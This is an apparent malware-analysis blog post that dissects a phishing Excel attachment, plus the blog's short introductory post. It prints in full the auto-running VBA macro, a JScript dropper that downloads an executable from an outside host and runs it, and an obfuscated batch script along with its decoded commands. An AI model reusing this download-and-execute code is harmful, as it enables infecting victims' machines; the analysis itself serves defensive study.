Month: March 2016

A case of a sadistic Excel file Pt. 1

Posted on Updated on

Yesterday we received an email with subject “CASH DEPOSIT – 3-1-2016” with an Excel file attached. Our infrastructure blocked it as an Excel with macros and Download & Execute capabilities. This Excel file had a characteristic that I haven’t seen before (in my brief experience with malwares). Parts of the macro code called VBScript code which is stored as actual cell values. So lets start… (cheers @aner for his support)

As always with Office files the wonderful and always useful tool of Didier Stevens oledump is needed, in order to analyze the structure of the file.

python oledump.py f90f80371ce8c0fd632b9a10d18ac136
  1:       102 '\x01CompObj'
  2:       352 '\x05DocumentSummaryInformation'
  3:       184 '\x05SummaryInformation'
  4:    182391 'Workbook'
  5:       720 '_VBA_PROJECT_CUR/PROJECT'
  6:       107 '_VBA_PROJECT_CUR/PROJECTwm'
  7: M    1540 '_VBA_PROJECT_CUR/VBA/Module1'
  8:      3838 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
  9:      1497 '_VBA_PROJECT_CUR/VBA/__SRP_0'
 10:       151 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 11:        94 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 12:       185 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 13:       853 '_VBA_PROJECT_CUR/VBA/dir'
 14: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x821'
 15: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x822'
 16: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x823'
 17: M    3528 '_VBA_PROJECT_CUR/VBA/\xd0\xad\xd1\x82\xd0\xb0\xd0\x9a\xd0\xbd\xd0\xb8\xd0\xb3\xd0\xb0'

As you can see, sections with M letter, are the ones that contain macros and are the ones that we should always begin with. Below there are three sections of VBScript code

Attribute VB_Name = "Module1"
Attribute VB_Name = "Module1"
Function ShW(ByVal ptrWSH, ByVal ptrStart, ByVal bWt)
Set yuwifdskjf = CreateObject("WS" & StrReverse("tpirc") & ".Sh" & StrReverse("lle"))
yuwifdskjf.Run ptrStart
End Function

Function rywiiowjx(ByVal ueiuwi, ByVal pimchw)
ueiuwi.SaveToFile pimchw, 2
End Function

Attribute VB_Name = "Ёта нига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
OnClick
End Sub

Sub OnClick()
On Error Resume Next

If ActiveSheet.Name = "Tot" & "al" Then Exit Sub

Dim vlB3
vlB3 = Worksheets("Cod" & "e").Range("B" & "3").Value

Dim kgfdad
kgfdad = StrReverse(".BDODA")
kgfdad = kgfdad & "St" & Mid(ActiveSheet.Name, 3, 1) & "e" & Mid(ActiveSheet.Name, 2, 1) & "m"

Set ewytufhd = CreateObject(kgfdad)

ewytufhd.Mode = 3
ewytufhd.Type = 2
ewytufhd.Open

Dim scrWS
scrWS = "wsc" & Mid(ActiveSheet.Name, 3, 1) & Mid(ActiveSheet.Name, 5, 1) & "pt." & Worksheets("Cod" & "e").Range("A" & "1").Value
Dim ptsBuf
ptsBuf = "%" & StrReverse("PMT") & "%"
ptsBuf = ptsBuf & "\srteam" & StrReverse("sj.")

'==================================================
Dim llSW
Set llSW = CreateObject(scrWS)
Dim tprSC
ptsBuf = llSW.ExpandEnvironmentStrings(ptsBuf)

tprSC = StrReverse("csw") & Mid(ActiveSheet.Name, 3, 1) & Mid("kipt", 2)

ewytufhd.WriteText vlB3

Application.Run "rywiiowjx", ewytufhd, ptsBuf
Application.Run "ShW", llSW, tprSC & " " & ptsBuf, True

Set MainSheet = Application.ThisWorkbook.Sheets("To" & "tal")
Set StartSheet = Application.ThisWorkbook.Sheets("War" & "ning")
MainSheet.Visible = True
StartSheet.Visible = xlVeryHide

ActiveWorkbook.Save

End Sub

 

So the first method that will be executed when the Document opens is the OnClick method. As you can see there are a lot of reversed strings. The surprising thing for me is that there are direct references on values of the document (instead of data streams) like the name of ActiveSheet and the value of cells A1 and B3. I usually see values inside streams of the document.

It could be easy to just open the Excel in a sandbox and extract the referenced data. I chose another approach. With Python library called xlrd it is possible to parse the Excel file and get the info we need. Here is the code of a small Python script that does exactly that.

workbook=xlrd.open_workbook("excel";)
worksheet=workbook.sheet_by_name('Code')
b_3=worksheet.cell(2,1).value
a_1=worksheet.cell(0,0).value # a_1 equals to word Shell
for i,s in enumerate(workbook.sheets()):
   print(i,s.name,s.sheet_selected,s.sheet_visible)

#output of the enumeration of worksheet is
(0, u'Warning', 1, 1)
(1, u'Total', 0, 0)
(2, u'Code', 0, 0)

So the script creates a file in path %tmp%\srteam.js (line 38) and stores (line 50 where “rywiiowjx” function is referenced in stream 7), the contents of cell B3 (it will be described below). In line 25 the value is “ADODB.Stream”. The script gets characters on position 3 and 2; which  r and a respectively (positions starts from 1 not 0 when using Mid function). In line 34 the string of course is “wscript.Shell”. In both cases these strings are VB objects in order to execute the JS script. Function ShW (line 51 which is referenced in stream 7) executes the  srteam.js. By the way the string in that line is “WScript.Shell”.

So lets see what are the contents of the cell B3 which will be execute

(function (Global){

function CreateObject(ProgId)
{
return new ActiveXObject(ProgId);
}

var FSO = fso = CreateObject("Scripting.FileSystemObject");
var WshShell = CreateObject("WScript.Shell");

function tmp()
{
var uyeifds = new ActiveXObject("Shell.Application");
return uyeifds;
}

var dwl2="p://";

function isFile(Path)
{
Path = WshShell.ExpandEnvironmentStrings(Path);
return fso.FileExists(Path);
}

function shl(rto)
{
tmp().ShellExecute(rto,"","","open","0");
}

function DeleteFile(Path)
{
if (/Array/i.test(Path.constructor+""))
{
for (var i=0, l=Path.length;i<l;i++)
DeleteFile(Path[i]);
return;
}

Path = WshShell.ExpandEnvironmentStrings(Path);
try
{
if (isFile(Path))
FSO.GetFile(Path).Delete(true);
} catch (e) {}
}

function DownloadFileFromURL(Url, FileDest)
{
var msx = "Msxml2";
if (!FileDest || !Url) return null;

var ge = "GE";

FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
msx = msx + ".XMLHTTP";
DeleteFile(FileDest);
var oXMLHTTP = WScript.CreateObject(msx);
oXMLHTTP.open (ge + "T", Url, false);
oXMLHTTP.send(null);
var oADOStream = CreateObject("ADO" + "DB.Stream");
with (oADOStream){
Mode = 3;
Type = 1;
Open()
Write (oXMLHTTP.responseBody);
SaveToFile(FileDest, 2);
Close();
return FileDest;
}
}

var tor1="%APPDATA%\\run.e";
var tor2="xe";

try
{
FSO.GetFile("\\\\WORKOUTD\\..hj");
} catch (e)
{

var Url="http://s2.zalivalka.ru/download/342557/554332.jpg";
DownloadFileFromURL(Url,tor1+tor2);

shl(WshShell.ExpandEnvironmentStrings(tor1+tor2));
}
})(this)

 

The javascript is fairly straight forward. The Global function is always executed first. The script downloads the file http://s2.zalivalka.ru/download/342557/554332.jpg and stores it in %appdata%\run.exe which is then executed. If anyone has an idea what is the meaning of \\WORKOUTD\..hg please let me know.

Now let’s analyze the downloaded file. We will run the great tool NtCore’s CFFExplorer which is free and offers full functionality for PE file static analysis.

Capture1

It seems that the original file name is wextract.exe so we can guess that this file is a self extracting executable created with iexpress. Wexetract.exe is the self extraction stub

Capture2

There is a resource file called CABINET which contains a .cab file (MSCF header). We can extract the .cab file and open it with any ZIP software. The contents of the CAB file are the following

  • poi.exe
  • 1.bat

There is also another resource the RUNPROGRAM which actually contains the file name of the file that will be executed after the self extraction process is completed. RUNPROGRAM contains the value of 1.bat which is the first file that will be executed.

As a last part of this post we will analyze the .bat file.


set uFxIfBjU=set
%uFxIfBjU% vmQRH=
%uFxIfBjU%%vmQRH%WlvwJ==
%uFxIfBjU%%vmQRH%niGHQ%WlvwJ%]
%uFxIfBjU%%vmQRH%gvNJihit%WlvwJ%M
%uFxIfBjU%%vmQRH%ubLLkCr%WlvwJ%L
%uFxIfBjU%%vmQRH%wYYyQIxk%WlvwJ%z
%uFxIfBjU%%vmQRH%WbawMPRLx%WlvwJ%l
%uFxIfBjU%%vmQRH%XwaRdC%WlvwJ%;
%uFxIfBjU%%vmQRH%SMfIu%WlvwJ%$
%uFxIfBjU%%vmQRH%JekiXWpq%WlvwJ%@
%uFxIfBjU%%vmQRH%mtoldyH%WlvwJ%9
%uFxIfBjU%%vmQRH%QffPfCDl%WlvwJ%_
%uFxIfBjU%%vmQRH%smzXUe%WlvwJ%(
%uFxIfBjU%%vmQRH%gJCt%WlvwJ%a
%uFxIfBjU%%vmQRH%CtvQzOlc%WlvwJ%D
%uFxIfBjU%%vmQRH%tKApd%WlvwJ%I
%uFxIfBjU%%vmQRH%GFNL%WlvwJ%S
%uFxIfBjU%%vmQRH%TaMgC%WlvwJ%F
%uFxIfBjU%%vmQRH%eYdGvjqA%WlvwJ%r
%uFxIfBjU%%vmQRH%kAJtQCe%WlvwJ%1
%uFxIfBjU%%vmQRH%CbrzJAoLY%WlvwJ%?
%uFxIfBjU%%vmQRH%MfcJVJhRo%WlvwJ%c
%uFxIfBjU%%vmQRH%KppMzH%WlvwJ%#
%uFxIfBjU%%vmQRH%CbeOdG%WlvwJ%T
%uFxIfBjU%%vmQRH%wkUfYM%WlvwJ%y
%uFxIfBjU%%vmQRH%qCCY%WlvwJ%C
%uFxIfBjU%%vmQRH%IeqoAr%WlvwJ%b
%uFxIfBjU%%vmQRH%zMUmhfp%WlvwJ%n
%uFxIfBjU%%vmQRH%VgoKTyH%WlvwJ%2
%uFxIfBjU%%vmQRH%IAiBMhM%WlvwJ%O
%uFxIfBjU%%vmQRH%AaWV%WlvwJ%:
%uFxIfBjU%%vmQRH%lCRh%WlvwJ%N
%uFxIfBjU%%vmQRH%VzRqFhIQ%WlvwJ%k
%uFxIfBjU%%vmQRH%UKYKKJt%WlvwJ%K
%uFxIfBjU%%vmQRH%NnRB%WlvwJ%3
%uFxIfBjU%%vmQRH%INirbsqG%WlvwJ%)
%uFxIfBjU%%vmQRH%wiPSW%WlvwJ%m
%uFxIfBjU%%vmQRH%qFclxaIHP%WlvwJ%.
%uFxIfBjU%%vmQRH%GhcPmRW%WlvwJ%*
%uFxIfBjU%%vmQRH%wJnFYm%WlvwJ%5
%uFxIfBjU%%vmQRH%zMgQwFM%WlvwJ%Y
%uFxIfBjU%%vmQRH%jCwDE%WlvwJ%q
%uFxIfBjU%%vmQRH%gPgacqpE%WlvwJ%!
%uFxIfBjU%%vmQRH%nKFutdce%WlvwJ%u
%uFxIfBjU%%vmQRH%GhGCV%WlvwJ%U
%uFxIfBjU%%vmQRH%VKdC%WlvwJ%t
%uFxIfBjU%%vmQRH%eEgBdYwt%WlvwJ%8
%uFxIfBjU%%vmQRH%xjXo%WlvwJ%B
%uFxIfBjU%%vmQRH%Tpcr%WlvwJ%H
%uFxIfBjU%%vmQRH%uDysBInSP%WlvwJ%E
%uFxIfBjU%%vmQRH%flSTw%WlvwJ%g
%uFxIfBjU%%vmQRH%vOjmHX%WlvwJ%P
%uFxIfBjU%%vmQRH%cJDeAFxaa%WlvwJ%v
%uFxIfBjU%%vmQRH%IDRnURC%WlvwJ%e
%uFxIfBjU%%vmQRH%rvKdv%WlvwJ%w
%uFxIfBjU%%vmQRH%YAXUzT%WlvwJ%R
%uFxIfBjU%%vmQRH%tRuE%WlvwJ%6
%uFxIfBjU%%vmQRH%nhRt%WlvwJ%0
%uFxIfBjU%%vmQRH%VVoOFw%WlvwJ%o
%uFxIfBjU%%vmQRH%iHXWWADYK%WlvwJ%X
%uFxIfBjU%%vmQRH%ryFCAi%WlvwJ%A
%uFxIfBjU%%vmQRH%rUFWQUVKk%WlvwJ%h
%uFxIfBjU%%vmQRH%YDOQcd%WlvwJ%i
%uFxIfBjU%%vmQRH%FvSVze%WlvwJ%s
%uFxIfBjU%%vmQRH%oAbh%WlvwJ%/
%uFxIfBjU%%vmQRH%tlGA%WlvwJ%+
%uFxIfBjU%%vmQRH%AhgUCQdNc%WlvwJ%x
%uFxIfBjU%%vmQRH%hbveWdig%WlvwJ%G
%uFxIfBjU%%vmQRH%sRQuCQHsB%WlvwJ%j
%uFxIfBjU%%vmQRH%jFbR%WlvwJ%[
%uFxIfBjU%%vmQRH%lITdx%WlvwJ%d
%uFxIfBjU%%vmQRH%VkONb%WlvwJ%7
%uFxIfBjU%%vmQRH%DcNlaOG%WlvwJ%{
%uFxIfBjU%%vmQRH%Dkyl%WlvwJ%V
%uFxIfBjU%%vmQRH%gxmBTj%WlvwJ%Q
%uFxIfBjU%%vmQRH%bJiooe%WlvwJ%"
%uFxIfBjU%%vmQRH%udasU%WlvwJ%\
%uFxIfBjU%%vmQRH%UkAijhn%WlvwJ%4
%uFxIfBjU%%vmQRH%DfIJfWaO%WlvwJ%W
%uFxIfBjU%%vmQRH%uHNRtTBo%WlvwJ%-
%uFxIfBjU%%vmQRH%sRaTV%WlvwJ%p
%uFxIfBjU%%vmQRH%sdbGC%WlvwJ%f
%uFxIfBjU%%vmQRH%fVqiK%WlvwJ%,
%uFxIfBjU%%vmQRH%mLjd%WlvwJ%}
%uFxIfBjU%%vmQRH%SAXwnTEq%WlvwJ%Z
%uFxIfBjU%%vmQRH%XyTlyKEg%WlvwJ%J
%JekiXWpq%%uDysBInSP%%MfcJVJhRo%%rUFWQUVKk%%VVoOFw%%vmQRH%%IAiBMhM%%sdbGC%%sdbGC%
%sRaTV%%YDOQcd%%zMUmhfp%%flSTw%%vmQRH%%uHNRtTBo%%zMUmhfp%%vmQRH%%VgoKTyH%%vmQRH%%flSTw%%VVoOFw%%VVoOFw%%flSTw%%WbawMPRLx%%IDRnURC%%qFclxaIHP%%MfcJVJhRo%%VVoOFw%%wiPSW%|%TaMgC%%YDOQcd%%zMUmhfp%%lITdx%%vmQRH%%oAbh%%tKApd%%vmQRH%%bJiooe%%CbeOdG%%CbeOdG%%ubLLkCr%%WlvwJ%%bJiooe%||%flSTw%%VVoOFw%%VKdC%%VVoOFw%%vmQRH%%zMUmhfp%%IDRnURC%%AhgUCQdNc%%VKdC%%vmQRH%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%%vmQRH%%oAbh%%cJDeAFxaa%%IDRnURC%%eYdGvjqA%%wkUfYM%%FvSVze%%YDOQcd%%WbawMPRLx%%IDRnURC%%zMUmhfp%%VKdC%%vmQRH%%oAbh%%vOjmHX%%gJCt%%FvSVze%%FvSVze%%rvKdv%%VVoOFw%%eYdGvjqA%%lITdx%%WlvwJ%%NnRB%%UkAijhn%%wJnFYm%%UkAijhn%%tRuE%%wJnFYm%%kAJtQCe%%VgoKTyH%%VgoKTyH%%NnRB%%UkAijhn%%wJnFYm%
%sRaTV%%YDOQcd%%zMUmhfp%%flSTw%%vmQRH%%WbawMPRLx%%VVoOFw%%MfcJVJhRo%%gJCt%%WbawMPRLx%%rUFWQUVKk%%VVoOFw%%FvSVze%%VKdC%%vmQRH%%uHNRtTBo%%kAJtQCe%%nhRt%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%0%vmQRH%>%vmQRH%%zMUmhfp%%nKFutdce%%WbawMPRLx%
%flSTw%%VVoOFw%%VKdC%%VVoOFw%%vmQRH%%kAJtQCe%
:next
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%0%vmQRH%>%vmQRH%%zMUmhfp%%nKFutdce%%WbawMPRLx%
:1
%uDysBInSP%%AhgUCQdNc%%YDOQcd%%VKdC%%vmQRH%

It is pretty ugly one but it is very easy to analyze it. Variable uFxIfBjU is “set” therefore %uFxIfBjU% vmQRH= sets and empty value to vmQRH. Based on my understanding it looks like space (see below). Finally th command %uFxIfBjU%%vmQRH%WlvwJ== is something like that “set WlvwJ=’='” . So lets clear the batch file a little bit based on the above.


set uFxIfBjU=set
set vmQRH=
set WlvwJ==
set niGHQ=]
set gvNJihit=M
set ubLLkCr=L
set wYYyQIxk=z
set WbawMPRLx=l
set XwaRdC=;
set SMfIu=$
set JekiXWpq=@
set mtoldyH=9
set QffPfCDl=_
set smzXUe=(
set gJCt=a
set CtvQzOlc=D
set tKApd=I
set GFNL=S
set TaMgC=F
set eYdGvjqA=r
set kAJtQCe=1
set CbrzJAoLY=?
set MfcJVJhRo=c
set KppMzH=#
set CbeOdG=T
set wkUfYM=y
set qCCY=C
set IeqoAr=b
set zMUmhfp=n
set VgoKTyH=2
set IAiBMhM=O
set AaWV=:
set lCRh=N
set VzRqFhIQ=k
set UKYKKJt=K
set NnRB=3
set INirbsqG=)
set wiPSW=m
set qFclxaIHP=.
set GhcPmRW=*
set wJnFYm=5
set zMgQwFM=Y
set jCwDE=q
set gPgacqpE=!
set nKFutdce=u
set GhGCV=U
set VKdC=t
set eEgBdYwt=8
set xjXo=B
set Tpcr=H
set uDysBInSP=E
set flSTw=g
set vOjmHX=P
set cJDeAFxaa=v
set IDRnURC=e
set rvKdv=w
set YAXUzT=R
set tRuE=6
set nhRt=0
set VVoOFw=o
set iHXWWADYK=X
set ryFCAi=A
set rUFWQUVKk=h
set YDOQcd=i
set FvSVze=s
set oAbh=/
set tlGA=+
set AhgUCQdNc=x
set hbveWdig=G
set sRQuCQHsB=j
set jFbR=[
set lITdx=d
set VkONb=7
set DcNlaOG={
set Dkyl=V
set gxmBTj=Q
set bJiooe="
set udasU=\
set UkAijhn=4
set DfIJfWaO=W
set uHNRtTBo=-
set sRaTV=p
set sdbGC=f
set fVqiK=,
set mLjd=}
set SAXwnTEq=Z
set XyTlyKEg=J

It looks much better right? So we have one more step. To decode the batch file. I am very lazy so I wrote a small python script in order to replace the value in the list of “set” commands in the batch file.

import re

replaceArray={}

f=open('battemp.txt','r')

while True:
line = f.readline()
#when there is no more "set" instructions stop looping
if("set" not in line):
break
else:
#tokenize "set XX=YYY" values
tok=re.split('\s|=',line)
#set the dictionary values in array
replaceArray[tok[1]]=tok[2]
print tok[1]

restOfFile = f.read()
for key in replaceArray:
print "%"+key+"%"
restOfFile = restOfFile.replace("%"+key+"%", replaceArray[key])

print restOfFile

Lets us see the output

ping -n 2 google.com|Find /I "TTL="||goto next
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
poi.exe /verysilent /Password=345465122345
ping localhost -10
del %0 > nul
goto 1
:next
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del %0 > nul
:1
Exit

 

So that’s all folks. In the next part of this post I will try to describe the functionality of the poi.exe. Any comments are more than welcome.

 

 

 

 

 

 

 

 

 

 

 

Hello World

Posted on Updated on

I have always been fascinated with malwares. I have also developed a small number of them and it was something I really enjoyed. However what I really like also, is to analyze them and trying to understand their internals. I started analyzing malware during various Cyber Security exercises organized by a variety of organizations, usually not public ones. During the last year, I had the opportunity to do the same thing as a side project at my everyday job.   Malware samples blocked from our security infrastructure are being collected and stored, so I am lucky enough to have access on them. To be precise this is a side project for me therefore, I don’t consider my self as a professional malware analyst but more like a researcher.

After this small introduction, let me describe the concept of the blog. I like to keep notes in order to be able to came back in case I forget about something. Therefore this blog is a notebook which might be useful to others also. Also it is a great opportunity to share information with other people more experts than me and maybe get useful comments.

Hopefully I will be able to frequently post new things, although I am not sure if the scope of this blog will include only malware analysis; in any case… Hello World